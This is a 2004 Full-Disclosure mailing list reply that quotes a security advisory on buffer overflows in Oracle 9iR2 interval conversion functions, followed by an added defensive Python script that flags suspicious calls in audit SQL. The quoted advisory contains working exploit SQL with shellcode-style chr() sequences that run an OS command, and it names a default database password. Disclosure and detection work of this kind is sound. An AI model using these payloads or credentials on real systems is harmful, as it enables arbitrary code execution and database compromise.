Hey Cesar.

These are known bugs.

We (NGS) found and reported them last year. As you say, Oracle has
already fixed them and released a patch. Check out

http://www.nextgenss.com/research.html

...where we posted advisories on these bugs in December, along with
another couple in from_tz and time_zone. We've historically found a lot
of issues in Oracle, so if you want to eliminate the stuff that's already
fixed from your list of 60+ issues it's a good place to look; the fine
detail isn't always available in the Oracle alerts.

     -chris.


On Thu, 5 Feb 2004, Cesar wrote:

> Security Advisory
>
> Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
> System Affected: Oracle Database 9ir2, previous versions could be affected too.
> Severity: High
> Remote exploitable: Yes
> Author: Cesar Cerrudo.
> Date: 02/05/04
> Advisory Number: CC020401
>
>
> Legal Notice:
>
> This Advisory is Copyright (c) 2003 Cesar Cerrudo.
> You may distribute it unmodified and for free. You may
> NOT modify it and distribute it or distribute
> parts of it without the author's written permission.
> You may NOT use it for commercial intentions
> (this means include it in vulnerabilities databases,
> vulnerabilities scanners, any paid service,
> etc.) without the author's written permission. You are
> free to use Oracle details for commercial intentions.
>
>
> Disclaimer:
>
> The information in this advisory is believed to be
> true though it may be false.
> The opinions expressed in this advisory are my own and
> not of any company. The usual standard
> disclaimer applies, especially the fact that Cesar
> Cerrudo is not liable for any damages caused
> by direct or indirect use of the information or
> functionality provided by this advisory.
> Cesar Cerrudo bears no responsibility for content or
> misuse of this advisory or any derivatives thereof.
>
>
>
> !!!!!!!!!!!ALERT!!!!!!!!!!!:
>
> Oracle was contacted about these vulnerabilities, but
> their Security Response Team is one of the worst that
> I have dealt with, they don't care about security and
> they don't even follow OISafety rules (Oracle is a
> member).
> For this reason we have only told Oracle about
> just a couple of bugs, I think I won't contact them
> anymore,
> or maybe if I get a letter from Larry Ellison asking
> for apologies...:).
> Anyways if Oracle would spend more money on security
> than on marketing saying that their products are
> unbreakable
> everything would be different. Right now Oracle
> database server and other Oracle products are some
> kind of backdoor.
> These vulnerabilities are just a bit of the 60+ that
> we have identified (yes more than 60 issues and
> most of these issues can be exploited by any low
> privileged user to take complete control over the
> database and probably OS, also for some of them there
> aren't any workarounds). If you are running Oracle I
> recommend you start praying not to be hacked and
> start complaining to Oracle to improve the quality
> of
> their products and to release patches.
>
> BTW: if someone from Oracle dares to say that I'm not
> telling the truth, then probably I will release all the
> information on the holes
> to shut their mouths.
>
> Some workarounds to protect your Oracle servers until
> maybe next year when Oracle probably could fix their
> buggy
> database server:
>
> - Check package permissions and remove public
> permission, set minimal permissions
> that fit your needs.
> - Check Directory Object permissions and remove public
> permission, set minimal permissions
> that fit your needs, remove Directory Objects if not
> used.
> - Restrict users from executing PL/SQL statements
> directly on the server.
> - Periodically audit users' permissions on all database
> objects.
> - Lock users that aren't used.
> - Change default passwords.
> If you want automation, I really like AppDetective for
> Oracle:
> http://www.appsecinc.com/products/appdetective/oracle/
>
>
> Overview:
>
> Oracle Database Server is one of the most used
> database servers in the world, it was marketed
> as being unbreakable and many people think it is
> one of the most secure database servers on
> the market. Larry Ellison (Oracle CEO) says that
> Oracle is used by NSA, CIA, Russian intelligence,
> governments, etc.
> (www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
> so it must be really secure!!!
> Oracle Database Server provides two functions that can
> be used with PL/SQL to convert numbers
> to date/time intervals, these functions have buffer
> overflow vulnerabilities.
>
>
>
> Details:
>
> When any of these conversion functions is called with
> a long string as the second
> parameter a buffer overflow occurs.
>
> To reproduce the overflow execute the following PL/SQL:
>
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
>
> SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
>
>
>
> This vulnerability can be exploited by any Oracle
> Database user because access to these
> functions can't be restricted.
> Exploitation of this vulnerability allows an attacker to
> execute arbitrary code, also it
> can be exploited to cause a DoS (denial of service)
> by killing the Oracle server process. An attacker can
> completely compromise the OS and database if Oracle is
> running on a Windows platform, because Oracle must
> run under the Local System account or under an
> administrative account. If Oracle is running on *nix
> then only the database could be compromised because
> Oracle mostly runs under the oracle user, which has
> restricted
> permissions.
> Important!: Exploitation of these vulnerabilities
> becomes easy if Oracle Internet Directory has
> been deployed, because Oracle Internet Directory
> creates a database user called ODSCOMMON that
> has a default password ODSCOMMON (Unbreakable???,
> hahaha, please take a look at this
>
> http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
> this password cannot be changed,
> so any attacker can use this user to connect to the
> database and exploit these vulnerabilities.
>
>
> Full tests on Oracle database 9ir2 under Microsoft
> Windows 2000 Server and Linux confirm these
> vulnerabilities,
> versions running on other OS platforms are believed
> to be affected too.
> Previous Oracle Database Server versions could be
> affected by these vulnerabilities.
>
>
>
> Exploits:
>
> --these exploits should work on W2K Server and WinXp,
> not tested on Win2003.
> --run any command at the end of the string
> SELECT
> NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
> SELECT
> NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> ||
>
> chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1
>
> 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
> ARE YOU SURE? >c:\Unbreakable.txt')
>
> FROM DUAL;
>
>
>
> Vendor Fix:
>
> Go to Oracle Metalink site, http://metalink.oracle.com
>
>
> Vendor Contact:
>
> Oracle was contacted and they released a fix without
> telling me nor the public anything and without issuing
> an alert.
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
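The advisory above notes that access to NUMTOYMINTERVAL and NUMTODSINTERVAL cannot be restricted, and its workaround list recommends auditing what users run. One defensive check that follows from that is to scan captured SQL text (for example from the audit trail) for calls whose unit argument is not one of the documented unit literals. The script below is an added example written for this page, not code from either author; the sample statements are constructed, and the valid-unit sets are Oracle's documented units for the two functions.

```python
import re

# Unit literals Oracle documents for the two interval conversion functions.
VALID_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)


def top_level_args(sql, open_paren):
    """Split the argument list of the call whose '(' is at sql[open_paren]
    on commas at nesting depth 0, leaving commas inside quoted strings alone."""
    args, buf, depth, in_str = [], [], 0, False
    for ch in sql[open_paren + 1:]:
        if ch == "'":
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                if depth == 0:
                    break          # closing paren of the call itself
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    args.append("".join(buf).strip())
    return args


def suspicious_interval_calls(sql):
    """Return [(function, reason)] for every call whose second (unit) argument
    is not a plain string literal naming one of the documented units."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args = top_level_args(sql, m.end() - 1)
        if len(args) < 2:
            continue
        lit = re.fullmatch(r"'([^']*)'", args[1])
        if lit is None:
            findings.append((func, "unit built at runtime (concatenation, chr() or expression)"))
        elif lit.group(1).upper() not in VALID_UNITS[func]:
            findings.append((func, f"unit literal is not a valid unit ({len(lit.group(1))} chars)"))
    return findings


# Constructed sample statements, as they might appear in an audit trail.
SAMPLE_SQL = [
    "SELECT NUMTOYMINTERVAL(27, 'MONTH') FROM dual",
    "select numtodsinterval(90, 'minute') from dual",
    "SELECT NUMTOYMINTERVAL(1, '" + "A" * 200 + "') FROM dual",
    "SELECT NUMTODSINTERVAL(1, 'AAAA' || chr(59) || chr(79)) FROM dual",
]
```

Only the last two sample statements are reported; a legitimate call always passes its unit as a short literal, so anything else is worth a look before a patch is applied.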